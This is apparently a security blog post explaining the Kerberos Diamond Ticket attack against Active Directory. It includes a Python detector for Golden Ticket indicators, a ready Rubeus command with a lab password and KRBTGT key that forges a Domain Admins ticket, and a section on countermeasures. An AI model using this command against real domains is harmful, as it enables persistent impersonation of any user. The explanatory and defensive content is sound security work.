Kerberos Tickets - Diamond Ticket
Completing this series on Kerberos tickets, we turn to the Diamond Ticket.
Like a Golden Ticket, a Diamond Ticket is a TGT that can be used to access any service as any user.
A Golden Ticket is created completely offline, encrypted with the KRBTGT hash of the domain in question, and then passed into a user session for use. Because domain controllers do not keep track of the TGTs they have legitimately issued, they will readily accept any TGT that is encrypted with their own KRBTGT account hash.
There are two common ways to detect the use of Golden Tickets:
- Search for TGS-REQ requests that have no corresponding AS-REQ request
- Search for TGTs with unusual values, such as a lifetime of 10 years, which Mimikatz sets by default
A Diamond Ticket is generated differently: by modifying the fields of a legitimate TGT previously issued by a DC. This is accomplished by first requesting a TGT, decrypting it with the domain's KRBTGT account key, modifying the desired fields of the ticket, and then re-encrypting it. In this way, the two detections mentioned above for a Golden Ticket are avoided, since:
- The TGS-REQ will have an associated AS-REQ
- The TGT was issued by a DC, which means it will have all the correct details of the domain's Kerberos policy. While it is true that these details can be accurately falsified during the creation of a Golden Ticket, it is more complex and open to error.
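The two Golden Ticket checks described above, implemented over constructed sample records as an added example (not code from the original post). It assumes a collector has already extracted, per client, the AS-REQ and TGS-REQ observations (for instance from a DC's Security log or a network capture) plus the TGT start/end times where a host-side ticket inventory makes them available; the client names, timestamps and the 10-hour default policy lifetime are assumptions.

```python
from datetime import datetime, timedelta

POLICY_MAX_TGT_LIFETIME = timedelta(hours=10)  # default Windows Kerberos policy (assumed)
AS_REQ_LOOKBACK = timedelta(hours=10)          # an AS-REQ is expected within the TGT's lifetime


def parse(ts):
    """Parse an ISO-8601 timestamp from a record."""
    return datetime.fromisoformat(ts)


# Constructed sample records, not taken from any real environment.
SAMPLE_EVENTS = [
    {"type": "AS-REQ", "client": "eddard.stark", "time": "2024-01-10T08:00:00"},
    {"type": "TGS-REQ", "client": "eddard.stark", "time": "2024-01-10T08:05:00",
     "tgt_start": "2024-01-10T08:00:00", "tgt_end": "2024-01-10T18:00:00"},
    # Golden Ticket pattern: TGS-REQ with no prior AS-REQ and a 10-year TGT lifetime
    {"type": "TGS-REQ", "client": "arya.stark", "time": "2024-01-10T09:00:00",
     "tgt_start": "2024-01-10T09:00:00", "tgt_end": "2034-01-08T09:00:00"},
]


def detect_golden_ticket_indicators(events, max_lifetime=POLICY_MAX_TGT_LIFETIME,
                                    lookback=AS_REQ_LOOKBACK):
    """Return (client, reason) findings for the two Golden Ticket checks.

    A Diamond Ticket defeats both: its base TGT came from a real AS-REQ and
    keeps the policy-consistent lifetime the DC wrote into it.
    """
    events = sorted(events, key=lambda e: parse(e["time"]))
    as_req_times = {}  # client -> AS-REQ timestamps seen so far
    findings = []
    for ev in events:
        t = parse(ev["time"])
        if ev["type"] == "AS-REQ":
            as_req_times.setdefault(ev["client"], []).append(t)
            continue
        if ev["type"] != "TGS-REQ":
            continue
        # Check 1: the TGS-REQ must be preceded by an AS-REQ from the same client
        recent = [a for a in as_req_times.get(ev["client"], []) if t - lookback <= a <= t]
        if not recent:
            findings.append((ev["client"], "TGS-REQ without preceding AS-REQ"))
        # Check 2: the TGT lifetime must respect the domain's Kerberos policy
        if "tgt_start" in ev and "tgt_end" in ev:
            life = parse(ev["tgt_end"]) - parse(ev["tgt_start"])
            if life > max_lifetime:
                findings.append((ev["client"], f"TGT lifetime {life} exceeds policy {max_lifetime}"))
    return findings
```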
Impact:
A Diamond Ticket, like a Golden Ticket, allows unlimited and persistent access to any resource within the domain until the krbtgt key is changed, which can be a complex and disruptive process.
Exploitation
As with the Golden Ticket, it requires the domain to already be fully compromised: the attacker must hold the KRBTGT account key.
Ticket creation
To create the Diamond Ticket we again use the Rubeus tool, executing the following command (the original parameter names were garbled; they are given here as Rubeus spells them):
```
Rubeus.exe diamond /domain:north.sevenkingdom.local /user:eddard.stark /password:FightP3aceAndHonor! /ticketuser:eddard.stark /ticketuserid:1111 /groups:512 /krbkey:42a38fe97bcf9c48190e5d77e48faa7d95b7fed838c8910845a86d66d78f188a /nowrap
```
- /domain: Domain name
- /user: User with which the TGT to be modified will be requested
- /password: Password of that user
- /ticketuser: User to impersonate
- /ticketuserid: RID (the final component of the SID) of the user to impersonate
- /groups: Groups to be added to the ticket (512 -> Domain Admins)
- /krbkey: AES256 key of the KRBTGT account
Import the ticket
The ticket is then injected into a new logon session, using the following parameters:
- Program: Command to execute where the ticket will be injected
- Domain: Domain name
- Username: Domain user
- Password: User password. It is not necessary to know the user's real password, since the ticket is used for authentication
- Ticket: The ticket created previously
Countermeasures:
- Password Rotation: Regularly change passwords for service accounts. In particular, ensure that the KRBTGT account is protected and that its password is changed periodically, although carefully due to the significant impact it could have on the environment.
- Service Account Security: Ensure that service accounts use strong, unique passwords.
- Segmentation and Limitation of Privileges: Apply the principle of least privilege and segment the network to limit the scope of any potential compromise, ensuring that access to critical resources is restricted and monitored.
- Audit and Monitoring: Configure auditing and comprehensive monitoring of authentication activity and Kerberos ticket usage.
- Proactive Monitoring and Detection: Implement advanced monitoring and detection solutions that can identify anomalous patterns and suspicious activities, including analysis of network traffic, authentication activity, and anomalous Kerberos ticket usage.
- Regular Audits and Reviews: Perform regular security audits and permissions reviews to identify and correct any misconfigurations or potential vulnerabilities.
| Feature | Silver Ticket | Golden Ticket | Diamond Ticket |
|---|---|---|---|
| Aim | Specific service | Access to the entire domain | Access to the entire domain |
| Required Credentials | Specific service account | Domain administrator or KRBTGT key | Domain administrator or KRBTGT key |
| Impact | Limited access to a service | Unlimited domain access | Unlimited domain access |
| Attack Complexity | Moderate | High | Very high |
| Key Countermeasures | Password rotation, monitoring | KRBTGT protection, comprehensive monitoring | KRBTGT protection, comprehensive monitoring |